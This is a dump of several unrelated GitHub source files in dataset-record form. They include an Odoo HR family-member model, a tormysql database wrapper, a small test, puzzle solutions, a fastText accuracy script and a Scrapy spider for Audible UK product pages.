prune_rows_without_hours(input_csv)\r\n","repo_name":"Shiberal/pdf-table-calendar-to-ics","sub_path":"prune.py","file_name":"prune.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72805246565","text":"import logging\nfrom ..constant.constant import Constant\nfrom ..common.validation import Validation\nfrom odoo.exceptions import ValidationError, except_orm\nfrom odoo import models, fields, api, _\n\n_logger = logging.getLogger(__name__)\n\nRELATION = [\n ('husband', 'Husband'),\n ('wife', 'Wife'),\n ('daughter', 'Daughter'),\n ('son', 'Son'),\n ('brother', 'Brother'),\n ('sister', 'Sister'),\n ('mother', 'Mother'),\n ('father', 'Father'),\n ('other', 'Other'),\n]\n\n\n# Employee family information\nclass FamilyMember(models.Model):\n _name = 'family.member'\n _description = 'Family Member'\n\n @api.onchange('copy_address_from')\n def on_change_opy_address_from(self):\n for record in self:\n if record.copy_address_from == \"present_address\":\n record.home_street = record.employee_id.pre_street\n record.home_city = record.employee_id.pre_city\n record.home_landmark = record.employee_id.pre_landmark\n record.home_pcode = record.employee_id.pre_pcode\n record.home_state = record.employee_id.pre_state\n record.home_county = record.employee_id.pre_county\n elif record.copy_address_from == \"permanent_address\":\n record.home_street = record.employee_id.per_street\n record.home_city = record.employee_id.per_city\n record.home_landmark = record.employee_id.per_landmark\n record.home_pcode = record.employee_id.per_pcode\n record.home_state = record.employee_id.per_state\n record.home_county = record.employee_id.per_county\n\n @api.onchange('check_per_address')\n def on_change_check_per_address(self):\n for record in self:\n record.home_street = None\n record.home_city = None\n record.home_landmark = None\n record.home_pcode = None\n record.home_state = None\n record.home_county = None\n record.copy_address_from = None\n\n employee_id = fields.Many2one('hr.employee', 'Employee')\n name = fields.Char('Name', size=60) # , required=True\n birth_date = fields.Date('DOB')\n gender = fields.Selection([('male', 'Male'), ('female', 'Female')], 'Gender')\n blood_group = fields.Selection(\n [('o+', 'O+'), ('o-', 'O-'), ('a+', 'A+'), ('a-', 'A-'), ('b+', 'B+'), ('b-', 'B-'), ('ab+', 'AB+'),\n ('ab-', 'AB-')], 'Blood Group')\n relation = fields.Selection(RELATION, 'Relation') # , required=True\n profession = fields.Char('Profession')\n nationality = fields.Many2one('res.country', 'Nationality', default=lambda self: self.env.company.country_id)\n remarks = fields.Text('Remarks')\n check_per_address = fields.Boolean('Address Same As employee')\n copy_address_from = fields.Selection(\n [('present_address', 'Present Address'), ('permanent_address', 'Permanent Address')], 'Copy Address From')\n home_street = fields.Char('Street')\n home_landmark = fields.Char('Landmark')\n home_city = fields.Char('City', size=30)\n home_pcode = fields.Char('Pin Code', size=6, help=\"Max size is 6\") # , required=True\n home_state = fields.Many2one('res.country.state', 'State') # , required=True\n home_county = fields.Many2one('res.country', 'Country') # , required=True\n home_phone = fields.Char('Mobile Phone')\n\n # Constraints for validation\n @api.constrains('name', 'home_pcode', 'home_phone')\n def _check_constraints(self):\n for rec in self:\n if rec.name:\n flag = Validation.check_names(rec.name)\n if not flag:\n raise ValidationError(Constant.INVALID_MEMBER_NAME)\n if rec.home_pcode:\n flag = Validation.check_digit(rec.home_pcode)\n if not flag:\n raise ValidationError(Constant.INVALID_MEMBER_PINCODE)\n if rec.home_phone:\n flag = Validation.check_phone(rec.home_phone)\n if not flag:\n raise ValidationError(Constant.INVALID_MEMBER_PHONE)\n return True\n\n\nclass MemberRelation(models.Model):\n _name = 'member.relation'\n _description = 'Member Relation'\n _rec_name = 'rel_name'\n\n rel_name = fields.Char('Relation', size=30) # , required=True\n\n # Constraints for validation\n @api.constrains('rel_name')\n def _check_constraints(self):\n for rec in self:\n if rec.rel_name:\n flag = Validation.check_names(rec.rel_name)\n if not flag:\n raise ValidationError(Constant.INVALID_RELATION_NAME)\n","repo_name":"Aarika13/Odoo-hrms","sub_path":"aspire-erp-15/aspl_hr_employee/models/employee_family.py","file_name":"employee_family.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20821316826","text":"# coding: u8\n\nfrom __future__ import unicode_literals\n\nimport logging\n\nfrom tornado import ioloop, gen\nfrom tornado.util import ObjectDict\n\nimport tormysql\n\n\nclass Connection(object):\n def __init__(self,\n host, port, database,\n user=None, password=None,\n max_connections=50, # 最大同时打开的连接数\n idle_seconds=3600, # 某个连接超过多少秒就关闭(mysql默认为8小时)\n wait_connection_timeout=10, # 连接超时等待时间(连接池满时等待其他连接释放)\n charset='utf8',\n ):\n self.host = host\n self.port = port\n\n self.user = user\n self.password = password\n\n self.database = database\n\n self.max_connections = max_connections\n self.idle_seconds = idle_seconds\n self.wait_connection_timeout = wait_connection_timeout\n self.charset = charset\n\n self.pool = None\n ioloop.IOLoop(make_current=False).run_sync(self.reconnect)\n\n @gen.coroutine\n def __del__(self):\n yield self.close()\n\n @gen.coroutine\n def close(self):\n \"\"\"Closes this database connection.\"\"\"\n if self.pool is not None:\n yield self.pool.close()\n self.pool = None\n\n @gen.coroutine\n def reconnect(self):\n \"\"\"Closes the existing database connection and re-opens it.\"\"\"\n\n yield self.close()\n\n self.pool = tormysql.ConnectionPool(\n host=self.host,\n port=self.port,\n\n user=self.user,\n passwd=self.password,\n\n db=self.database,\n\n max_connections=self.max_connections,\n idle_seconds=self.idle_seconds,\n wait_connection_timeout=self.wait_connection_timeout,\n\n charset=self.charset,\n )\n\n @gen.coroutine\n def query(self, query, *args, **kwargs):\n \"\"\"Returns a row list for the given query and args.\"\"\"\n\n with (yield self.pool.Connection()) as conn:\n try:\n with conn.cursor() as cursor:\n yield self._execute(cursor, query, args, kwargs)\n except:\n yield conn.rollback()\n else:\n yield conn.commit()\n\n column_names = [d[0] for d in cursor.description]\n datas = [ObjectDict(zip(column_names, row)) for row in cursor]\n raise gen.Return(datas)\n\n @gen.coroutine\n def get(self, query, *args, **kwargs):\n \"\"\"Returns the (singular) row returned by the given query.\n\n If the query has no results, returns None. If it has\n more than one result, raises an exception.\n \"\"\"\n\n rows = yield self.query(query, *args, **kwargs)\n if not rows:\n raise gen.Return(None)\n elif len(rows) > 1:\n raise Exception(\"Multiple rows returned by function get()\")\n else:\n raise gen.Return(rows[0])\n\n # rowcount is a more reasonable default return value than lastrowid,\n # but for historical compatibility execute() must return lastrowid.\n @gen.coroutine\n def execute(self, query, *args, **kwargs):\n \"\"\"Executes the given query, returning the lastrowid from the query.\"\"\"\n\n return self.execute_lastrowid(query, *args, **kwargs)\n\n @gen.coroutine\n def execute_lastrowid(self, query, *args, **kwargs):\n \"\"\"Executes the given query, returning the lastrowid from the query.\"\"\"\n\n with (yield self.pool.Connection()) as conn:\n try:\n with conn.cursor() as cursor:\n yield self._execute(cursor, query, args, kwargs)\n except:\n yield conn.rollback()\n else:\n yield conn.commit()\n raise gen.Return(cursor.lastrowid)\n\n @gen.coroutine\n def execute_rowcount(self, query, *args, **kwargs):\n \"\"\"Executes the given query, returning the rowcount from the query.\"\"\"\n\n with (yield self.pool.Connection()) as conn:\n try:\n with conn.cursor() as cursor:\n yield self._execute(cursor, query, args, kwargs)\n except:\n yield conn.rollback()\n else:\n yield conn.commit()\n raise gen.Return(cursor.rowcount)\n\n @gen.coroutine\n def executemany(self, query, args):\n \"\"\"Executes the given query against all the given param sequences.\n\n We return the lastrowid from the query.\n \"\"\"\n return self.executemany_lastrowid(query, args)\n\n @gen.coroutine\n def executemany_lastrowid(self, query, args):\n \"\"\"Executes the given query against all the given param sequences.\n\n We return the lastrowid from the query.\n \"\"\"\n\n with (yield self.pool.Connection()) as conn:\n try:\n with conn.cursor() as cursor:\n yield cursor.executemany(query, args)\n except:\n yield conn.rollback()\n else:\n yield conn.commit()\n raise gen.Return(cursor.lastrowid)\n\n @gen.coroutine\n def executemany_rowcount(self, query, args):\n \"\"\"Executes the given query against all the given param sequences.\n\n We return the rowcount from the query.\n \"\"\"\n\n with (yield self.pool.Connection()) as conn:\n try:\n with conn.cursor() as cursor:\n yield cursor.executemany(query, args)\n except:\n yield conn.rollback()\n else:\n yield conn.commit()\n raise gen.Return(cursor.rowcount)\n\n update = delete = execute_rowcount\n updatemany = executemany_rowcount\n\n insert = execute_lastrowid\n insertmany = executemany_lastrowid\n\n @gen.coroutine\n def _execute(self, cursor, query, args, kwargs):\n try:\n yield cursor.execute(query, kwargs or args)\n except:\n logging.error(\"Error connecting to MySQL on %s\", self.host)\n self.close()\n raise\n","repo_name":"Shu-Ji/tormysql-torndb","sub_path":"tormysql_torndb.py","file_name":"tormysql_torndb.py","file_ext":"py","file_size_in_byte":6042,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"32708954158","text":"from api_models.event_comment import EventCommentCreate\nfrom db import crud\nfrom db.tests import factory\n\n\ndef test_create(db):\n event = factory.event.create_or_read(name=\"test\", db=db)\n obj = crud.event_comment.create_or_read(\n model=EventCommentCreate(event_uuid=event.uuid, username=\"analyst\", value=\"test\"), db=db\n )\n\n assert obj.value == \"test\"\n\n\ndef test_create_duplicate_value(db):\n event = factory.event.create_or_read(name=\"test\", db=db)\n obj1 = crud.event_comment.create_or_read(\n model=EventCommentCreate(event_uuid=event.uuid, username=\"analyst\", value=\"test\"), db=db\n )\n assert obj1\n\n # Ensure that you get the same object back if you try to create a duplicate value\n obj2 = crud.event_comment.create_or_read(\n model=EventCommentCreate(event_uuid=event.uuid, username=\"analyst\", value=obj1.value), db=db\n )\n assert obj2.uuid == obj1.uuid\n assert obj2.value == obj1.value\n","repo_name":"seanmcfeely/ace2-ams","sub_path":"db/app/db/tests/test_crud/event_comment/test_create.py","file_name":"test_create.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9386697110","text":"import sys\nsys.stdin = open('input.txt')\n\ninput = sys.stdin.readline\nN = int(input())\nbar = [int(input()) for _ in range(N)]\ncount = 0\ncheck = 0\nfor height in reversed(bar):\n if height > check:\n check = height\n count += 1\nprint(count)\n","repo_name":"skysky44/TIL","sub_path":"03_Algorithm/day12/실습/17608.py","file_name":"17608.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"44293336756","text":"from fasttext_sim import *\n\nimport math\nimport random\n\ndef calculate_online_accuracy():\n\ttest_size = math.ceil(len(texts)*0.20)\n\ttest_ids = random.sample(range(0, len(texts)), test_size)\n\n\ttexts_train = {}\n\ttexts_test = {}\n\n\tfor k, v in enumerate(texts.keys()):\n\t\tcopy = {\n\t\t\t\"vector\": texts[v][\"vector\"],\n\t\t\t\"text\": texts[v][\"text\"],\n\t\t\t\"skill\": texts[v][\"skill\"]\n\t\t}\n\t\tif k in test_ids:\n\t\t\tcopy[\"distance\"] = texts[v][\"distance\"]\n\t\t\ttexts_test[v] = copy\n\t\telse:\n\t\t\ttexts_train[v] = copy\n\n\tonline_accuracy_base = []\n\tfor i in range(len(ffms)):\n\t\ta = 0\n\t\tfor k, v in texts_test.items():\n\t\t\tdistances = OrderedDict(sorted(v[\"distance\"].items(), key=lambda item: item[0]))\n\t\t\tmatches = [m[\"match\"] for m in [v for v in distances.values()]]\n\t\t\ta += np.sum(matches[0:(i+1)])\n\t\tonline_accuracy_base.append(a / len(texts_test))\n\n\t[texts_test[d].pop(\"distance\", None) for d in texts_test] # small cleanup\n\n\tfor k in texts_test:\n\t\ttexts_test[k][\"distances\"] = []\n\n\t\tfor kk in ffms:\n\t\t\ttexts_test[k][\"distances\"].append([cosine_distance(texts_test[k][\"vector\"], ffms[kk][\"vector\"]), kk])\t\n\n\t\tfor kk in texts_train:\n\t\t\ttexts_test[k][\"distances\"].append([cosine_distance(texts_test[k][\"vector\"], texts_train[kk][\"vector\"]), texts_train[kk][\"skill\"]])\n\n\t\tseen = {}\n\t\tresult = []\n\t\tdistances = OrderedDict(sorted(texts_test[k][\"distances\"], key=lambda item: item[0]))\n\t\tfor i, pair in enumerate(distances.items()):\n\t\t\tif pair[1] not in seen:\n\t\t\t\tresult.append(pair)\n\t\t\t\tseen[pair[1]] = True\n\n\t\ttexts_test[k][\"distances\"] = []\n\t\tfor r in result:\n\t\t\tif r[1] == texts_test[k][\"skill\"]:\n\t\t\t\ttexts_test[k][\"distances\"].append([r[0], r[1], True])\n\t\t\telse:\n\t\t\t\ttexts_test[k][\"distances\"].append([r[0], r[1], False])\n\n\tonline_accuracy_final = []\n\tfor i in range(len(ffms)):\n\t\ta = 0\n\n\t\tfor k in texts_test:\n\t\t\tmatches = [m[2] for m in [v for v in texts_test[k][\"distances\"]]]\n\t\t\ta += np.sum(matches[0:(i+1)])\n\t\t\t\n\t\tonline_accuracy_final.append(a / len(texts_test))\n\n\treturn [online_accuracy_final, online_accuracy_base]\n\naccomulator = []\nfor i in range(1000):\n\taccomulator.append(calculate_online_accuracy()[0])\n\tprint(\"i is\", i)\n\nresult = np.zeros(len(ffms))\nfor key in accomulator:\n\tfor i, aac in enumerate(key):\n\t\tresult[i] = result[i] + aac\nresult = result/1000.0\n\ndef online_accuracy_plot():\n\tplt.title(\"Accuracy of fastText semi-supervised, online model\")\n\tplt.plot(range(1, len(ffms) + 1), online_accuracy_base)\n\tplt.plot(range(1, len(ffms) + 1), online_accuracy_final)\n\tplt.legend(['Base (offline) accuracy', 'Online accuracy'], loc='upper left')\n\tplt.grid()\n\tplt.xlabel((\"In top X\"))\n\tplt.ylabel((\"Accuracy\"))\n\tplt.show(block=False)\n\tinput(\"Hit Enter To Close\")\n\tplt.close()\n","repo_name":"eugene/gyldendal","sub_path":"online_fasttext_sim.py","file_name":"online_fasttext_sim.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"4978209525","text":"from pathlib import Path\n\nimport pandas\nfrom collections import OrderedDict\n\n\nclass BingoSubsystem:\n\n def __init__(self):\n with open(Path(__file__).parent / 'input.txt', 'r') as f:\n raw_input = f.read().split('\\n')[:-1]\n self.numbers = [int(num) for num in raw_input[0].split(',')]\n self.boards = [\n pandas.concat([\n pandas.DataFrame(data=[int(num) for num in row.split(' ') if num != '']).T\n for row in raw_input[i + 1:i + 6]\n ]).reset_index(drop=True)\n for i, row in enumerate(raw_input) if row == ''\n ]\n self.marks = [\n pandas.DataFrame({i: [False, False, False, False, False] for i in range(0, 5)})\n for _ in range(0, len(self.boards))\n ]\n\n def play(self):\n wins = OrderedDict()\n for num in self.numbers:\n for i, board in enumerate(self.boards):\n self.marks[i] = self.marks[i] + board.isin([num])\n if i not in wins and (self.marks[i].all().any() or self.marks[i].all(axis='columns').any()):\n wins[i] = self.calc_score(num, board, self.marks[i])\n return wins.popitem(last=False)[1], wins.popitem()[1]\n\n @staticmethod\n def calc_score(num, board, marks):\n unmarked_sum = board.mask(marks).sum().sum()\n return int(unmarked_sum * num)\n\n\nif __name__ == '__main__':\n bs = BingoSubsystem()\n solution_1, solution_2 = bs.play()\n print(f'Solution 1 = {solution_1}')\n print(f'Solution 2 = {solution_2}')\n assert solution_1 == 25410\n assert solution_2 == 2730\n","repo_name":"zachflanders/advent-of-code-2021","sub_path":"solutions/day_4/day_4.py","file_name":"day_4.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32123806349","text":"# Yêu cầu:\n# 1. nhập vào số bác sĩ\n# 2. nhập vào số y tá\n# 3. tính số nhóm cực đại có thể chia\n\na = int(input(\"Nhap vao so bac si: \"))\n\nb = int(input(\"Nhap vao so y ta: \"))\n\nwhile a != b:\n if a > b:\n a = a - b\n\n elif a < b:\n b = b - a\n \n# lặp đến lúc a và b bằng nhau thì thôi\n# chắc chắn sẽ có lúc bằng nhau\n# nếu bằng nhau thì dừng vòng lặp while\nn = a\n\nprint(f\"So nhom chia duoc la: {n}\")","repo_name":"conggaro/Hoc_Python","sub_path":"code python/Tuần 5 Câu lệnh lặp/Tìm ước chung lớn nhất/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22040387172","text":"import json\nimport re\nimport scrapy\nfrom urllib.parse import urljoin\n\nRAW_PRODUCT_IDS = \"\"\"B004EVK3HG\n,B004FJHGE0\n,B004HJBZV8\n,B004S7OIOU\n,B004ZGYFQA\n,B0064DYOUE\n,B007KBKVEW\n,B007W5BSX4\n,B004ELYQIS\n,B004EXITL6\n\"\"\"\n\n\nclass AudibleCoUkProductSpider(scrapy.Spider):\n name = 'audible_co_uk_product'\n allowed_domains = ['www.audible.co.uk']\n start_urls = ['https://httpbin.org/ip']\n\n def parse(self, response): # NOQA\n product_ids = RAW_PRODUCT_IDS.split(',')\n for product_id in product_ids:\n split_id = product_id.strip()\n item_url = urljoin('https://www.audible.co.uk/pd/', split_id)\n yield scrapy.Request(url=item_url, callback=self.parse_product)\n\n def parse_product(self, response):\n audiobook_data, product_data = None, None\n for script in response.xpath('//div[@id=\\'bottom-0\\']/script'):\n if script.xpath(\"./self::*[contains(text(),\"\n \"'\\\"@type\\\": \\\"Audiobook\\\"')]/text()\"):\n audiobook_data = json.loads(script.xpath(\"./text()\").get())[0]\n elif script.xpath(\"./self::*[contains(text(),\"\n \"'\\\"@type\\\": \\\"Product\\\"')]/text()\"):\n product_data = json.loads(script.xpath(\"./text()\").get())[0]\n if not audiobook_data or not product_data:\n self.logger.error(f'No script data found for {response.url}')\n return\n\n item = {\n \"url\": response.url,\n 'title_name': audiobook_data.get('name', ''),\n 'no_reviews': audiobook_data.get('aggregateRating'\n '', {}).get('ratingCount', 0)\n }\n\n if audiobook_data.get('publisher'):\n item['publisher'] = audiobook_data['publisher']\n if audiobook_data.get('inLanguage'):\n item['lang'] = audiobook_data['inLanguage']\n if audiobook_data.get('datePublished'):\n item['publication_date'] = audiobook_data['datePublished']\n if audiobook_data.get('datePublished'):\n item['publication_date'] = audiobook_data['datePublished']\n if audiobook_data.get('aggregateRating', {}).get('ratingValue'):\n item['avg_review_score'] = audiobook_data['aggregateRating'\n '']['ratingValue'][:4]\n if audiobook_data.get('offers').get('highPrice'):\n item['buy_price'] = audiobook_data['offers']['highPrice']\n if product_data.get('productID'):\n item['asin'] = product_data['productID']\n if product_data.get('sku'):\n item['sku'] = product_data['sku']\n\n authors = []\n if audiobook_data.get('author'):\n for author in audiobook_data.get('author', []):\n authors.append(author['name'])\n item['authors'] = authors\n\n narrators = []\n if audiobook_data.get('readBy'):\n for narrator in audiobook_data.get('readBy', []):\n narrators.append(narrator['name'])\n item['narrators'] = narrators\n\n item_duration = audiobook_data.get('duration')\n if item_duration:\n t_minute = re.findall(r'(\\d+)M', item_duration)\n t_hour = re.findall(r'(\\d+)H', item_duration)\n if t_hour and t_minute:\n hour = t_hour[0]\n minute = t_minute[0]\n item['duration'] = f'{hour}:{minute}'\n elif t_hour:\n hour = t_hour[0]\n item['duration'] = f'{hour}:00'\n elif t_minute:\n item['duration'] = t_minute[0]\n\n av = re.findall(r'(\\w+)$', audiobook_data['offers']['availability'])\n if av:\n if av[0] == 'InStock':\n item['available'] = True\n else:\n item['available'] = False\n\n yield item\n","repo_name":"Barkond/audible_zyte","sub_path":"audible/spiders/audible_co_uk_product.py","file_name":"audible_co_uk_product.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}